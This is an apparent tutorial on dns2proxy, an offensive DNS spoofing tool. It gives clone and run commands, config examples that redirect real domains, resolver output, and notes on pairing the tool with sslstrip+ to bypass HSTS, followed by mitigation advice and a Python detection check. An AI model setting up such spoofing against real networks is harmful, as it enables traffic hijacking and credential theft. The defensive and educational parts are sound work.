dns2proxy is an offensive DNS server that offers diverse features for post-exploitation once you have changed the DNS server of a victim.
DNS spoofing, also referred to as DNS cache poisoning, is a form of computer hacking in which corrupt Domain Name System data is introduced into the DNS resolver's cache, causing the name server to return an incorrect IP address. This results in traffic being diverted to the attacker's computer (or any other computer).
Features
- Traditional DNS Spoofing
- Implements DNS Spoofing via Forwarding
- Detects and corrects changes for sslstrip to work
Installation
dnspython (www.dnspython.com) is needed. Tested with Python 2.6 and Python 2.7. You can just clone the git repository and start working.
root@kali: # git clone https://github.com/LeonardoNve/dns2proxy.git
Starting dns2proxy: DNS Spoofing via Forwarding
You need to start dns2proxy and bind it to an interface IP address. Usually this is the eth0 interface.
root@kali: # cd dns2proxy/
root@kali: /dns2proxy#
root@kali: /dns2proxy# python dns2proxy.py -i eth0 -u 10.0.2.15
Non spoofing to 127.0.0.1
Specific host spoofing www.abc.com with 10.10.10.20
Specific domain IP .facebook.com with 172.217.17.68
Specific domain IP .fbi.gov with 172.217.17.68
Specific domain IP .one.com with 127.0.0.1
DNS Forwarding activado....
binded to UDP port 53.
waiting requests.
This feature implements the DNS spoofing attack by adding 2 IP addresses at the top of the resolution and configuring the system to forward the connections. Check the slides from BlackHat Asia 2014, OFFENSIVE: EXPLOITING DNS SERVERS CHANGES, and the demo video. To launch this attack there is a shell script that automatically configures the system using iptables. You must edit this file to adjust it to your system. DON'T FORGET the AdminIP variable!!!!
Both IPs must be on the same system to allow dns2proxy.py to configure the forwarding.
Traditional DNS Spoofing
Traditional DNS spoofing, adding the original IP address to the response. Using the spoof.cfg file:
root@kali: /dns2proxy# echo "www.blakcmoreops.com 127.0.0.1" > spoof.cfg
root@kali: /dns2proxy# dig www.blakcmoreops.com @localhost
; <<>> DiG 9.10.3-P4-Debian <<>> www.blakcmoreops.com @localhost
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 51485
;; flags: qr aa rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1
;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 8192
;; QUESTION SECTION:
;www.blakcmoreops.com. IN A
;; Query time: 357 msec
;; SERVER: 127.0.0.1#53(127.0.0.1)
;; WHEN: Tue Mar 21 14:07:23 AEDT 2017
;; MSG SIZE rcvd: 49
root@kali: /dns2proxy#
or you can use the domains.cfg file to spoof all hosts of the same domain:
root@kali: /dns2proxy# cat domains.cfg
.facebook.com 172.217.17.68
.fbi.gov 172.217.17.68
.one.com 127.0.0.1
root@kali: /dns2proxy#
Hostnames in nospoof.cfg will not be spoofed.
Detects together with corrects changes for sslstrip to work
The DNS server automatically detects and corrects the changes that my sslstrip+ makes to hostnames to avoid HSTS, so it will respond properly. This server is necessary to carry out the sslstrip+ attack.
root@kali: /dns2proxy# nslookup webaccounts.google.com 127.0.0.1 <-- DNS response like accounts.google.com
Server: 127.0.0.1
Address: 127.0.0.1#53
Name: webaccounts.google.com
Address: 172.16.48.128
Name: webaccounts.google.com
Address: 172.16.48.230
Name: webaccounts.google.com
Address: 74.125.200.84
root@kali: /dns2proxy# nslookup wwww.yahoo.com 127.0.0.1 <-- Take care of the four w! DNS response like www.yahoo.com
Server: 127.0.0.1
Address: 127.0.0.1#53
Name: wwww.yahoo.com
Address: 172.16.48.128
Name: wwww.yahoo.com
Address: 172.16.48.230
Name: wwww.yahoo.com
Address: 68.142.243.179
Name: wwww.yahoo.com
Address: 68.180.206.184
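The two answer patterns shown above, the forwarding attack that prepends two attacker-controlled addresses to the real record set and the sslstrip+ hostname rewriting (wwww.yahoo.com for www.yahoo.com, webaccounts.google.com for accounts.google.com), are what a defender would look for in resolver logs. The check below is an added example, not code from dns2proxy or sslstrip+: the observed answers are modelled on the nslookup output above, the "trusted" answers and the mail.google.com entry are constructed, and the name-mangling rule is a heuristic derived from the two cases the post shows.

```python
import ipaddress
from typing import Dict, List, Optional

# Constructed sample: answers the victim's resolver returned (from the nslookup
# output above) versus answers from a trusted resolver (assumed values).
OBSERVED: Dict[str, List[str]] = {
    "webaccounts.google.com": ["172.16.48.128", "172.16.48.230", "74.125.200.84"],
    "wwww.yahoo.com": ["172.16.48.128", "172.16.48.230",
                       "68.142.243.179", "68.180.206.184"],
    "mail.google.com": ["203.0.113.5"],  # constructed, untouched name
}
TRUSTED: Dict[str, List[str]] = {
    "accounts.google.com": ["74.125.200.84"],
    "www.yahoo.com": ["68.142.243.179", "68.180.206.184"],
    "mail.google.com": ["203.0.113.5"],
}

def original_name(qname: str) -> Optional[str]:
    """Map an sslstrip+-style mangled name back to the name it stands in for.
    Heuristic from the post's two cases: 'wwww.' -> 'www.', 'webX.' -> 'X.'.
    Returns None when the leftmost label shows neither pattern."""
    first, _, rest = qname.rstrip(".").partition(".")
    if first == "wwww":
        return "www." + rest
    if first.startswith("web") and len(first) > 3:
        return first[3:] + "." + rest
    return None

def prepended_addresses(observed: List[str], trusted: List[str]) -> List[str]:
    """Addresses a spoofing forwarder placed in front of the genuine answer
    set; empty when the observed answers end with exactly the trusted ones."""
    if not trusted or len(observed) < len(trusted):
        return []
    cut = len(observed) - len(trusted)
    return observed[:cut] if observed[cut:] == trusted else []

def check(qname: str) -> dict:
    """Report mangling and prepended (especially RFC 1918) addresses for one name."""
    target = original_name(qname) or qname
    extra = prepended_addresses(OBSERVED.get(qname, []), TRUSTED.get(target, []))
    return {
        "query": qname,
        "mangled": target != qname,
        "prepended": extra,
        "private_prepended": any(ipaddress.ip_address(a).is_private for a in extra),
    }

if __name__ == "__main__":
    for name in OBSERVED:
        print(check(name))
```

Private addresses at the head of a public hostname's answer set are the forwarding signature the post describes; a mangled name with no prepended addresses still indicates a client that followed a stripped link.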
Config files description
domains.cfg (or dominios.cfg): resolve all hosts of the listed domains with the listed IP
Ex: .facebook.com 1.2.3.4 .fbi.gov 1.2.3.4
spoof.cfg: spoof a host with an IP
Ex: www.nsa.gov 127.0.0.1
nospoof.cfg: always send a legitimate response when asked for these hosts.
Ex. mail.google.com
nospoofto.cfg: don't send fake responses to the IPs listed there.
Ex: 127.0.0.1 4.5.6.8
victims.cfg: if not empty, only send fake responses to these IP addresses.
Ex: 23.66.163.36 195.12.226.131
resolv.conf: DNS server to forward the queries to.
Ex: nameserver 8.8.8.8
Prevention and mitigation
Many cache poisoning attacks against DNS servers can be prevented by being less trusting of the information passed to them by other DNS servers, and by ignoring any DNS records passed back which are not directly relevant to the query. For example, versions of BIND 9.5.0-P1 and above perform these checks. Source port randomization for DNS requests, combined with the use of cryptographically secure random numbers for selecting both the source port and the 16-bit cryptographic nonce, can greatly reduce the probability of successful DNS race attacks.
However, when routers, firewalls, proxies, and other gateway devices perform network address translation (NAT), or more specifically port address translation (PAT), they may rewrite source ports in order to track connection state. When modifying source ports, PAT devices may remove the source port randomness implemented by nameservers and stub resolvers.
Secure DNS (DNSSEC) uses cryptographic digital signatures signed with a trusted public key certificate to determine the authenticity of data. DNSSEC can counter cache poisoning attacks, but as of 2008 was not yet widely deployed. In 2010 DNSSEC was implemented in the Internet root zone servers.
This kind of attack can be mitigated at the transport layer or application layer by performing end-to-end validation once a connection is established. A common example of this is the use of Transport Layer Security and digital signatures. For example, by using HTTPS (the secure version of HTTP), users may check whether the server's digital certificate is valid and belongs to the website's expected owner. Similarly, the secure shell remote login program checks digital certificates at endpoints (if known) before proceeding with the session. For applications that download updates automatically, the application can embed a copy of the signing certificate locally and validate the signature stored in the software update against the embedded certificate. [Source: Wiki]
